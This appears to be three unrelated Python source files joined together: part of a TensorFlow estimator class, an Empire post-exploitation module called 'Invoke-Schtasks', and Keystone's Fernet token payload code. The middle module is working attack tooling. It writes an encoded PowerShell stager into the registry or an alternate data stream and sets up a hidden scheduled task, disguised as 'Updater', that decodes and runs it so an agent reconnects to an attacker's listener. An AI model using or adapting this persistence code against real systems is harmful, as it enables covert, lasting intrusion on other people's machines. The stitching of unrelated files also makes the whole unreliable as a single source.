iterator that returns arrays of features. The training input
samples for fitting the model.
y: vector or matrix [n_samples] or [n_samples, n_outputs]. Can be
iterator that returns array of targets. The training target values
(class labels in classification, real numbers in regression).
steps: int, number of steps to train.
If None or 0, train for `self.steps`.
monitors: List of `BaseMonitor` objects to print training progress and
invoke early stopping.
logdir: the directory to save the log file that can be used for
optional visualization.
Returns:
Returns self.
"""
if logdir is not None:
self._model_dir = logdir
self._data_feeder = setup_train_data_feeder(
x, y, n_classes=self.n_classes, batch_size=self.batch_size)
self._train_model(input_fn=self._data_feeder.input_builder,
feed_fn=self._data_feeder.get_feed_dict_fn(),
steps=steps or self.steps,
monitors=monitors)
return self
def evaluate(self, x=None, y=None, input_fn=None, steps=None):
"""See base class."""
feed_fn = None
if x is not None:
eval_data_feeder = setup_train_data_feeder(
x, y, n_classes=self.n_classes, batch_size=self.batch_size, epochs=1)
input_fn, feed_fn = (eval_data_feeder.input_builder,
eval_data_feeder.get_feed_dict_fn())
return self._evaluate_model(
input_fn=input_fn, feed_fn=feed_fn, steps=steps or self.steps)
def partial_fit(self, x, y):
"""Incremental fit on a batch of samples.
This method is expected to be called several times consecutively
on different or the same chunks of the dataset. This either can
implement iterative training or out-of-core/online training.
This is especially useful when the whole dataset is too big to
fit in memory at the same time. Or when model is taking long time
to converge, and you want to split up training into subparts.
Args:
x: matrix or tensor of shape [n_samples, n_features...]. Can be
iterator that returns arrays of features. The training input
samples for fitting the model.
y: vector or matrix [n_samples] or [n_samples, n_outputs]. Can be
iterator that returns array of targets. The training target values
(class label in classification, real numbers in regression).
Returns:
Returns self.
"""
return self.fit(x, y)
def _predict(self, x, axis=-1, batch_size=None):
if self._graph is None:
raise NotFittedError()
# Use the batch size for fitting if the user did not specify one.
if batch_size is None:
batch_size = self.batch_size
predict_data_feeder = setup_train_data_feeder(
x, None, n_classes=None,
batch_size=batch_size,
shuffle=False, epochs=1)
preds = self._infer_model(
input_fn=predict_data_feeder.input_builder,
feed_fn=predict_data_feeder.get_feed_dict_fn())
if self.n_classes > 1 and axis != -1:
preds = preds.argmax(axis=axis)
else:
preds = preds
return preds
def predict(self, x, axis=1, batch_size=None):
"""Predict class or regression for X.
For a classification model, the predicted class for each sample in X is
returned. For a regression model, the predicted value based on X is
returned.
Args:
x: array-like matrix, [n_samples, n_features...] or iterator.
axis: Which axis to argmax for classification.
By default axis 1 (next after batch) is used.
Use 2 for sequence predictions.
batch_size: If test set is too big, use batch size to split
it into mini batches. By default the batch_size member
variable is used.
Returns:
y: array of shape [n_samples]. The predicted classes or predicted
value.
"""
return self._predict(x, axis=axis, batch_size=batch_size)
def predict_proba(self, x, batch_size=None):
"""Predict class probability of the input samples X.
Args:
x: array-like matrix, [n_samples, n_features...] or iterator.
batch_size: If test set is too big, use batch size to split
it into mini batches. By default the batch_size member variable is used.
Returns:
y: array of shape [n_samples, n_classes]. The predicted
probabilities for each class.
"""
return self._predict(x, batch_size=batch_size)
def get_tensor(self, name):
"""Returns tensor by name.
Args:
name: string, name of the tensor.
Returns:
Tensor.
"""
return self._graph.get_tensor_by_name(name)
def get_tensor_value(self, name):
"""Returns value of the tensor give by name.
Args:
name: string, name of the tensor.
Returns:
Numpy array - value of the tensor.
"""
if name.endswith(':0'):
name = name[:-2]
return checkpoints.load_variable(self.model_dir, name)
def get_variable_names(self):
"""Returns list of all variable names in this model.
Returns:
List of names.
"""
return [name for name, _ in checkpoints.list_variables(self.model_dir)]
def save(self, path):
"""Saves checkpoints and graph to given path.
Args:
path: Folder to save model to.
"""
if self._graph is None:
raise NotFittedError
# Copy model dir into new path.
_copy_dir(self.model_dir, path)
# Save model definition.
all_params = self.get_params()
params = {}
for key, value in all_params.items():
if not callable(value) and value is not None:
params[key] = value
params['class_name'] = type(self).__name__
model_def = json.dumps(
params,
default=lambda o: o.__dict__ if hasattr(o, '__dict__') else None)
_write_with_backup(os.path.join(path, 'model.def'), model_def)
def _restore(self, path):
"""Restores this estimator from given path.
Note: will rebuild the graph and initialize all parameters,
and will ignore provided model.
Args:
path: Path to checkpoints and other information.
"""
raise NotImplementedError
# pylint: disable=unused-argument
@classmethod
def restore(cls, path, config=None):
"""Restores model from give path.
Args:
path: Path to the checkpoints and other model information.
config: RunConfig object that controls the configurations of the session,
e.g. num_cores, gpu_memory_fraction, etc. This is allowed to be
reconfigured.
Returns:
Estimator, object of the subclass of TensorFlowEstimator.
"""
model_def_filename = os.path.join(path, 'model.def')
if not os.path.exists(model_def_filename):
raise ValueError("Restore folder doesn't contain model definition.")
# list of parameters that are allowed to be reconfigured
reconfigurable_params = ['_config']
_config = config
with gfile.Open(model_def_filename) as fmodel:
model_def = json.loads(fmodel.read())
# TensorFlow binding requires parameters to be strings not unicode.
# Only issue in Python2.
for key, value in model_def.items():
if isinstance(value, string_types) and not isinstance(value, str):
model_def[key] = str(value)
if key in reconfigurable_params:
new_value = locals()[key]
if new_value is not None:
model_def[key] = new_value
class_name = model_def.pop('class_name')
if class_name == 'TensorFlowEstimator':
custom_estimator = TensorFlowEstimator(model_fn=None, **model_def)
custom_estimator._restore(path)
return custom_estimator
# To avoid cyclical dependencies, import inside the function instead of
# the beginning of the file.
from tensorflow.contrib.learn.python.learn import estimators
# Estimator must be one of the defined estimators in the __init__ file.
estimator = getattr(estimators, class_name)(**model_def)
estimator._restore(path)
return estimator
class TensorFlowBaseTransformer(TensorFlowEstimator, _sklearn.TransformerMixin):
"""TensorFlow Base Transformer class."""
def transform(self, X):
"""Transform X using trained transformer."""
return(super(TensorFlowBaseTransformer, self).predict(X, axis=1, batch_size=None))
def fit(self, X, y=None, monitor=None, logdir=None):
"""Fit a transformer."""
return(super(TensorFlowBaseTransformer, self).fit(X, y, monitors=None, logdir=None))
def fit_transform(self, X, y=None, monitor=None, logdir=None):
"""Fit transformer and transform X using trained transformer."""
return(self.fit(X, y, monitor=None, logdir=None).transform(X))
| |
import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Schtasks',
'Author': ['@mattifestation', '@harmj0y'],
'Description': ('Persist a stager (or script) using schtasks. This has a moderate detection/removal rating.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'DailyTime' : {
'Description' : 'Daily time to trigger the script (HH:mm).',
'Required' : False,
'Value' : '09:00'
},
'IdleTime' : {
'Description' : 'User idle time (in minutes) to trigger script.',
'Required' : False,
'Value' : ''
},
'TaskName' : {
'Description' : 'Name to use for the schtask.',
'Required' : True,
'Value' : 'Updater'
},
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKCU:\Software\Microsoft\Windows\CurrentVersion\debug'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
'Required' : False,
'Value' : ''
},
'ExtFile' : {
'Description' : 'Use an external file for the payload instead of a stager.',
'Required' : False,
'Value' : ''
},
'Cleanup' : {
'Description' : 'Switch. Cleanup the trigger and any script from specified location.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
# trigger options
dailyTime = self.options['DailyTime']['Value']
idleTime = self.options['IdleTime']['Value']
taskName = self.options['TaskName']['Value']
# storage options
regPath = self.options['RegPath']['Value']
adsPath = self.options['ADSPath']['Value']
# management options
extFile = self.options['ExtFile']['Value']
cleanup = self.options['Cleanup']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
statusMsg = ""
locationString = ""
# for cleanup, remove any script from the specified storage location
# and remove the specified trigger
if cleanup.lower() == 'true':
if adsPath != '':
# remove the ADS storage location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
else:
# remove the script stored in the registry at the specified reg path
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
script += "schtasks /Delete /F /TN "+taskName+";"
script += "'Schtasks persistence removed.'"
return script
if extFile != '':
# read in an external file as the payload and build a
# base64 encoded version as encScript
if os.path.exists(extFile):
f = open(extFile, 'r')
fileData = f.read()
f.close()
# unicode-base64 encode the script for -enc launching
encScript = helpers.enc_powershell(fileData)
statusMsg += "using external file " + extFile
else:
print helpers.color("[!] File does not exist: " + extFile)
return ""
else:
# if an external file isn't specified, use a listener
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
encScript = launcher.split(" ")[-1]
statusMsg += "using listener " + listenerName
if adsPath != '':
# store the script in the specified alternate data stream location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
locationString = "$(cmd /c \''\''more < "+adsPath+"\''\''\'')"
else:
# otherwise store the script into the specified registry location
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
statusMsg += " stored in " + regPath
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
# note where the script is stored
locationString = "(gp "+path+" "+name+")."+name
# built the command that will be triggered by the schtask
triggerCmd = "'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonI -W hidden -c \\\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String("+locationString+")))\\\"'"
# sanity check to make sure we haven't exceeded the cmd.exe command length max
if len(triggerCmd) > 259:
print helpers.color("[!] Warning: trigger command exceeds the maximum of 259 characters.")
return ""
if idleTime != '':
script += "schtasks /Create /F /SC ONIDLE /I "+idleTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" idle trigger on " + idleTime + "."
else:
# otherwise assume we're doing a daily trigger
script += "schtasks /Create /F /SC DAILY /ST "+dailyTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" daily trigger at " + dailyTime + "."
script += "'Schtasks persistence established "+statusMsg+"'"
return script
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import datetime
import struct
import uuid
from cryptography import fernet
import msgpack
from oslo_log import log
from oslo_utils import timeutils
from keystone.auth import plugins as auth_plugins
from keystone.common import fernet_utils as utils
from keystone.common import utils as ks_utils
import keystone.conf
from keystone import exception
from keystone.i18n import _
CONF = keystone.conf.CONF
LOG = log.getLogger(__name__)
# Fernet byte indexes as computed by pypi/keyless_fernet and defined in
# https://github.com/fernet/spec
TIMESTAMP_START = 1
TIMESTAMP_END = 9
class TokenFormatter(object):
"""Packs and unpacks payloads into tokens for transport."""
@property
def crypto(self):
"""Return a cryptography instance.
You can extend this class with a custom crypto @property to provide
your own token encoding / decoding. For example, using a different
cryptography library (e.g. ``python-keyczar``) or to meet arbitrary
security requirements.
This @property just needs to return an object that implements
``encrypt(plaintext)`` and ``decrypt(ciphertext)``.
"""
fernet_utils = utils.FernetUtils(
CONF.fernet_tokens.key_repository,
CONF.fernet_tokens.max_active_keys,
'fernet_tokens'
)
keys = fernet_utils.load_keys()
if not keys:
raise exception.KeysNotFound()
fernet_instances = [fernet.Fernet(key) for key in keys]
return fernet.MultiFernet(fernet_instances)
def pack(self, payload):
"""Pack a payload for transport as a token.
:type payload: bytes
:rtype: str
"""
# base64 padding (if any) is not URL-safe
return self.crypto.encrypt(payload).rstrip(b'=').decode('utf-8')
def unpack(self, token):
"""Unpack a token, and validate the payload.
:type token: str
:rtype: bytes
"""
token = TokenFormatter.restore_padding(token)
try:
return self.crypto.decrypt(token.encode('utf-8'))
except fernet.InvalidToken:
raise exception.ValidationError(
_('Could not recognize Fernet token'))
@classmethod
def restore_padding(cls, token):
"""Restore padding based on token size.
:param token: token to restore padding on
:type token: str
:returns: token with correct padding
"""
# Re-inflate the padding
mod_returned = len(token) % 4
if mod_returned:
missing_padding = 4 - mod_returned
token += '=' * missing_padding
return token
@classmethod
def creation_time(cls, fernet_token):
"""Return the creation time of a valid Fernet token.
:type fernet_token: str
"""
fernet_token = TokenFormatter.restore_padding(fernet_token)
# fernet_token is str
# Fernet tokens are base64 encoded, so we need to unpack them first
# urlsafe_b64decode() requires bytes
token_bytes = base64.urlsafe_b64decode(fernet_token.encode('utf-8'))
# slice into the byte array to get just the timestamp
timestamp_bytes = token_bytes[TIMESTAMP_START:TIMESTAMP_END]
# convert those bytes to an integer
# (it's a 64-bit "unsigned long long int" in C)
timestamp_int = struct.unpack(">Q", timestamp_bytes)[0]
# and with an integer, it's trivial to produce a datetime object
issued_at = datetime.datetime.utcfromtimestamp(timestamp_int)
return issued_at
def create_token(self, user_id, expires_at, audit_ids, payload_class,
methods=None, system=None, domain_id=None,
project_id=None, trust_id=None, federated_group_ids=None,
identity_provider_id=None, protocol_id=None,
access_token_id=None, app_cred_id=None):
"""Given a set of payload attributes, generate a Fernet token."""
version = payload_class.version
payload = payload_class.assemble(
user_id, methods, system, project_id, domain_id, expires_at,
audit_ids, trust_id, federated_group_ids, identity_provider_id,
protocol_id, access_token_id, app_cred_id
)
versioned_payload = (version,) + payload
serialized_payload = msgpack.packb(versioned_payload)
token = self.pack(serialized_payload)
# NOTE(lbragstad): We should warn against Fernet tokens that are over
# 255 characters in length. This is mostly due to persisting the tokens
# in a backend store of some kind that might have a limit of 255
# characters. Even though Keystone isn't storing a Fernet token
# anywhere, we can't say it isn't being stored somewhere else with
# those kind of backend constraints.
if len(token) > 255:
LOG.info('Fernet token created with length of %d '
'characters, which exceeds 255 characters',
len(token))
return token
def validate_token(self, token):
"""Validate a Fernet token and returns the payload attributes.
:type token: str
"""
serialized_payload = self.unpack(token)
# TODO(melwitt): msgpack changed their data format in version 1.0, so
# in order to support a rolling upgrade, we must pass raw=True to
# support the old format. The try-except may be removed once the
# N-1 release no longer supports msgpack < 1.0.
try:
versioned_payload = msgpack.unpackb(serialized_payload)
except UnicodeDecodeError:
versioned_payload = msgpack.unpackb(serialized_payload, raw=True)
version, payload = versioned_payload[0], versioned_payload[1:]
for payload_class in _PAYLOAD_CLASSES:
if version == payload_class.version:
(user_id, methods, system, project_id, domain_id,
expires_at, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id) = payload_class.disassemble(payload)
break
else:
# If the token_format is not recognized, raise ValidationError.
raise exception.ValidationError(_(
'This is not a recognized Fernet payload version: %s') %
version)
# FIXME(lbragstad): Without this, certain token validation tests fail
# when running with python 3. Once we get further along in this
# refactor, we should be better about handling string encoding/types at
# the edges of the application.
if isinstance(system, bytes):
system = system.decode('utf-8')
# rather than appearing in the payload, the creation time is encoded
# into the token format itself
issued_at = TokenFormatter.creation_time(token)
issued_at = ks_utils.isotime(at=issued_at, subsecond=True)
expires_at = timeutils.parse_isotime(expires_at)
expires_at = ks_utils.isotime(at=expires_at, subsecond=True)
return (user_id, methods, audit_ids, system, domain_id, project_id,
trust_id, federated_group_ids, identity_provider_id,
protocol_id, access_token_id, app_cred_id, issued_at,
expires_at)
class BasePayload(object):
# each payload variant should have a unique version
version = None
@classmethod
def assemble(cls, user_id, methods, system, project_id, domain_id,
expires_at, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id):
"""Assemble the payload of a token.
:param user_id: identifier of the user in the token request
:param methods: list of authentication methods used
:param system: a string including system scope information
:param project_id: ID of the project to scope to
:param domain_id: ID of the domain to scope to
:param expires_at: datetime of the token's expiration
:param audit_ids: list of the token's audit IDs
:param trust_id: ID of the trust in effect
:param federated_group_ids: list of group IDs from SAML assertion
:param identity_provider_id: ID of the user's identity provider
:param protocol_id: federated protocol used for authentication
:param access_token_id: ID of the secret in OAuth1 authentication
:param app_cred_id: ID of the application credential in effect
:returns: the payload of a token
"""
raise NotImplementedError()
@classmethod
def disassemble(cls, payload):
"""Disassemble an unscoped payload into the component data.
The tuple consists of::
(user_id, methods, system, project_id, domain_id,
expires_at_str, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id,` access_token_id, app_cred_id)
* ``methods`` are the auth methods.
Fields will be set to None if they didn't apply to this payload type.
:param payload: this variant of payload
:returns: a tuple of the payloads component data
"""
raise NotImplementedError()
@classmethod
def convert_uuid_hex_to_bytes(cls, uuid_string):
"""Compress UUID formatted strings to bytes.
:param uuid_string: uuid string to compress to bytes
:returns: a byte representation of the uuid
"""
uuid_obj = uuid.UUID(uuid_string)
return uuid_obj.bytes
@classmethod
def convert_uuid_bytes_to_hex(cls, uuid_byte_string):
"""Generate uuid.hex format based on byte string.
:param uuid_byte_string: uuid string to generate from
:returns: uuid hex formatted string
"""
uuid_obj = uuid.UUID(bytes=uuid_byte_string)
return uuid_obj.hex
@classmethod
def _convert_time_string_to_float(cls, time_string):
"""Convert a time formatted string to a float.
:param time_string: time formatted string
:returns: a timestamp as a float
"""
time_object = timeutils.parse_isotime(time_string)
return (timeutils.normalize_time(time_object) -
datetime.datetime.utcfromtimestamp(0)).total_seconds()
@classmethod
def _convert_float_to_time_string(cls, time_float):
"""Convert a floating point timestamp to a string.
:param time_float: integer representing timestamp
:returns: a time formatted strings
"""
time_object = datetime.datetime.utcfromtimestamp(time_float)
return ks_utils.isotime(time_object, subsecond=True)
@classmethod
def attempt_convert_uuid_hex_to_bytes(cls, value):
"""Attempt to convert value to bytes or return value.
:param value: value to attempt to convert to bytes
:returns: tuple containing boolean indicating whether user_id was
stored as bytes and uuid value as bytes or the original value
"""
try:
return (True, cls.convert_uuid_hex_to_bytes(value))
except (ValueError, TypeError):
# ValueError: this might not be a UUID, depending on the
# situation (i.e. federation)
# TypeError: the provided value may be binary encoded
# in which case just return the value (i.e. Python 3)
return (False, value)
@classmethod
def base64_encode(cls, s):
"""Encode a URL-safe string.
:type s: str
:rtype: str
"""
# urlsafe_b64encode() returns bytes so need to convert to
# str, might as well do it before stripping.
return base64.urlsafe_b64encode(s).decode('utf-8').rstrip('=')
@classmethod
def random_urlsafe_str_to_bytes(cls, s):
"""Convert string from :func:`random_urlsafe_str()` to bytes.
:type s: str
:rtype: bytes
"""
# urlsafe_b64decode() requires str, unicode isn't accepted.
s = str(s)
# restore the padding (==) at the end of the string
return base64.urlsafe_b64decode(s + '==')
@classmethod
def _convert_or_decode(cls, is_stored_as_bytes, value):
"""Convert a value to text type, translating uuid -> hex if required.
:param is_stored_as_bytes: whether value is already bytes
:type is_stored_as_bytes: boolean
:param value: value to attempt to convert to bytes
:type value: str or bytes
:rtype: str
"""
if is_stored_as_bytes:
return cls.convert_uuid_bytes_to_hex(value)
elif isinstance(value, bytes):
return value.decode('utf-8')
return value
class UnscopedPayload(BasePayload):
version = 0
@classmethod
def assemble(cls, user_id, methods, system, project_id, domain_id,
expires_at, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id):
b_user_id = cls.attempt_convert_uuid_hex_to_bytes(user_id)
methods = auth_plugins.convert_method_list_to_integer(methods)
expires_at_int = cls._convert_time_string_to_float(expires_at)
b_audit_ids = list(map(cls.random_urlsafe_str_to_bytes,
audit_ids))
return (b_user_id, methods, expires_at_int, b_audit_ids)
@classmethod
def disassemble(cls, payload):
(is_stored_as_bytes, user_id) = payload[0]
user_id = cls._convert_or_decode(is_stored_as_bytes, user_id)
methods = auth_plugins.convert_integer_to_method_list(payload[1])
expires_at_str = cls._convert_float_to_time_string(payload[2])
audit_ids = list(map(cls.base64_encode, payload[3]))
system = None
project_id = None
domain_id = None
trust_id = None
federated_group_ids = None
identity_provider_id = None
protocol_id = None
access_token_id = None
app_cred_id = None
return (user_id, methods, system, project_id, domain_id,
expires_at_str, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id)
class DomainScopedPayload(BasePayload):
version = 1
@classmethod
def assemble(cls, user_id, methods, system, project_id, domain_id,
expires_at, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id):
b_user_id = cls.attempt_convert_uuid_hex_to_bytes(user_id)
methods = auth_plugins.convert_method_list_to_integer(methods)
try:
b_domain_id = cls.convert_uuid_hex_to_bytes(domain_id)
except ValueError:
# the default domain ID is configurable, and probably isn't a UUID
if domain_id == CONF.identity.default_domain_id:
b_domain_id = domain_id
else:
raise
expires_at_int = cls._convert_time_string_to_float(expires_at)
b_audit_ids = list(map(cls.random_urlsafe_str_to_bytes,
audit_ids))
return (b_user_id, methods, b_domain_id, expires_at_int, b_audit_ids)
@classmethod
def disassemble(cls, payload):
(is_stored_as_bytes, user_id) = payload[0]
user_id = cls._convert_or_decode(is_stored_as_bytes, user_id)
methods = auth_plugins.convert_integer_to_method_list(payload[1])
try:
domain_id = cls.convert_uuid_bytes_to_hex(payload[2])
except ValueError:
# the default domain ID is configurable, and probably isn't a UUID
if isinstance(payload[2], bytes):
payload[2] = payload[2].decode('utf-8')
if payload[2] == CONF.identity.default_domain_id:
domain_id = payload[2]
else:
raise
expires_at_str = cls._convert_float_to_time_string(payload[3])
audit_ids = list(map(cls.base64_encode, payload[4]))
system = None
project_id = None
trust_id = None
federated_group_ids = None
identity_provider_id = None
protocol_id = None
access_token_id = None
app_cred_id = None
return (user_id, methods, system, project_id, domain_id,
expires_at_str, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id)
class ProjectScopedPayload(BasePayload):
version = 2
@classmethod
def assemble(cls, user_id, methods, system, project_id, domain_id,
expires_at, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id):
b_user_id = cls.attempt_convert_uuid_hex_to_bytes(user_id)
methods = auth_plugins.convert_method_list_to_integer(methods)
b_project_id = cls.attempt_convert_uuid_hex_to_bytes(project_id)
expires_at_int = cls._convert_time_string_to_float(expires_at)
b_audit_ids = list(map(cls.random_urlsafe_str_to_bytes,
audit_ids))
return (b_user_id, methods, b_project_id, expires_at_int, b_audit_ids)
@classmethod
def disassemble(cls, payload):
(is_stored_as_bytes, user_id) = payload[0]
user_id = cls._convert_or_decode(is_stored_as_bytes, user_id)
methods = auth_plugins.convert_integer_to_method_list(payload[1])
(is_stored_as_bytes, project_id) = payload[2]
project_id = cls._convert_or_decode(is_stored_as_bytes, project_id)
expires_at_str = cls._convert_float_to_time_string(payload[3])
audit_ids = list(map(cls.base64_encode, payload[4]))
system = None
domain_id = None
trust_id = None
federated_group_ids = None
identity_provider_id = None
protocol_id = None
access_token_id = None
app_cred_id = None
return (user_id, methods, system, project_id, domain_id,
expires_at_str, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id)
class TrustScopedPayload(BasePayload):
version = 3
@classmethod
def assemble(cls, user_id, methods, system, project_id, domain_id,
expires_at, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id):
b_user_id = cls.attempt_convert_uuid_hex_to_bytes(user_id)
methods = auth_plugins.convert_method_list_to_integer(methods)
b_project_id = cls.attempt_convert_uuid_hex_to_bytes(project_id)
b_trust_id = cls.convert_uuid_hex_to_bytes(trust_id)
expires_at_int = cls._convert_time_string_to_float(expires_at)
b_audit_ids = list(map(cls.random_urlsafe_str_to_bytes,
audit_ids))
return (b_user_id, methods, b_project_id, expires_at_int, b_audit_ids,
b_trust_id)
@classmethod
def disassemble(cls, payload):
(is_stored_as_bytes, user_id) = payload[0]
user_id = cls._convert_or_decode(is_stored_as_bytes, user_id)
methods = auth_plugins.convert_integer_to_method_list(payload[1])
(is_stored_as_bytes, project_id) = payload[2]
project_id = cls._convert_or_decode(is_stored_as_bytes, project_id)
expires_at_str = cls._convert_float_to_time_string(payload[3])
audit_ids = list(map(cls.base64_encode, payload[4]))
trust_id = cls.convert_uuid_bytes_to_hex(payload[5])
system = None
domain_id = None
federated_group_ids = None
identity_provider_id = None
protocol_id = None
access_token_id = None
app_cred_id = None
return (user_id, methods, system, project_id, domain_id,
expires_at_str, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id)
class FederatedUnscopedPayload(BasePayload):
version = 4
@classmethod
def pack_group_id(cls, group_dict):
return cls.attempt_convert_uuid_hex_to_bytes(group_dict['id'])
@classmethod
def unpack_group_id(cls, group_id_in_bytes):
(is_stored_as_bytes, group_id) = group_id_in_bytes
group_id = cls._convert_or_decode(is_stored_as_bytes, group_id)
return {'id': group_id}
@classmethod
def assemble(cls, user_id, methods, system, project_id, domain_id,
expires_at, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id):
b_user_id = cls.attempt_convert_uuid_hex_to_bytes(user_id)
methods = auth_plugins.convert_method_list_to_integer(methods)
b_group_ids = list(map(cls.pack_group_id, federated_group_ids))
b_idp_id = cls.attempt_convert_uuid_hex_to_bytes(identity_provider_id)
expires_at_int = cls._convert_time_string_to_float(expires_at)
b_audit_ids = list(map(cls.random_urlsafe_str_to_bytes,
audit_ids))
return (b_user_id, methods, b_group_ids, b_idp_id, protocol_id,
expires_at_int, b_audit_ids)
@classmethod
def disassemble(cls, payload):
(is_stored_as_bytes, user_id) = payload[0]
user_id = cls._convert_or_decode(is_stored_as_bytes, user_id)
methods = auth_plugins.convert_integer_to_method_list(payload[1])
group_ids = list(map(cls.unpack_group_id, payload[2]))
(is_stored_as_bytes, idp_id) = payload[3]
idp_id = cls._convert_or_decode(is_stored_as_bytes, idp_id)
protocol_id = payload[4]
if isinstance(protocol_id, bytes):
protocol_id = protocol_id.decode('utf-8')
expires_at_str = cls._convert_float_to_time_string(payload[5])
audit_ids = list(map(cls.base64_encode, payload[6]))
system = None
project_id = None
domain_id = None
trust_id = None
access_token_id = None
app_cred_id = None
return (user_id, methods, system, project_id, domain_id,
expires_at_str, audit_ids, trust_id, group_ids, idp_id,
protocol_id, access_token_id, app_cred_id)
class FederatedScopedPayload(FederatedUnscopedPayload):
version = None
@classmethod
def assemble(cls, user_id, methods, system, project_id, domain_id,
expires_at, audit_ids, trust_id, federated_group_ids,
identity_provider_id, protocol_id, access_token_id,
app_cred_id):
b_user_id = cls.attempt_convert_uuid_hex_to_bytes(user_id)
methods = auth_plugins.convert_method_list_to_integer(methods)
b_scope_id = cls.attempt_convert_uuid_hex_to_bytes(
project_id or domain_id)
b_group_ids = list(map(cls.pack_group_id, federated_group_ids))
b_idp_id = cls.attempt_convert_uuid_hex_to_bytes(identity_provider_id)
expires_at_int = cls._convert_time_string_to_float(expires_at)
b_audit_ids = list(map(cls.random_urlsafe_str_to_bytes,
audit_ids))
return (b_user_id, methods, b_scope_id, b_group_ids, b_idp_id,
protocol_id, expires_at_int, b_audit_ids)
@classmethod
def disassemble(cls, payload):
(is_stored_as_bytes, user_id) = payload[0]
user_id = cls._convert_or_decode(is_stored_as_bytes, user_id)
methods = auth_plugins.convert_integer_to_method_list(payload[1])
(is_stored_as_bytes, scope_id) = payload[2]
scope_id = cls._convert_or_decode(is_stored_as_bytes, scope_id)
project_id = (
scope_id
if cls.version == FederatedProjectScopedPayload.version else None)
domain_id = (
scope_id
if cls.version == FederatedDomainScopedPayload.version else None)
group_ids = list(map(cls.unpack_group_id, payload[3]))
(is_stored_as_bytes, idp_id) = payload[4]
idp_id = cls._convert_or_decode(is_stored_as_bytes, idp_id)
protocol_id = payload[5]
if isinstance(protocol_id, bytes):
protocol_id = protocol_id.decode('utf-8')
expires_at_str = cls._convert_float_to_time_string(payload[6])
audit_ids = list(map(cls.base64_encode, payload[7]))
system = None
trust_id = None
access_token_id = None
app_cred_id = None
return (user_id, methods, system, project_id, domain_id,
expires_at_str, audit_ids, trust_id, group_ids, idp_id,
protocol_id, access_token_id, app_cred_id)
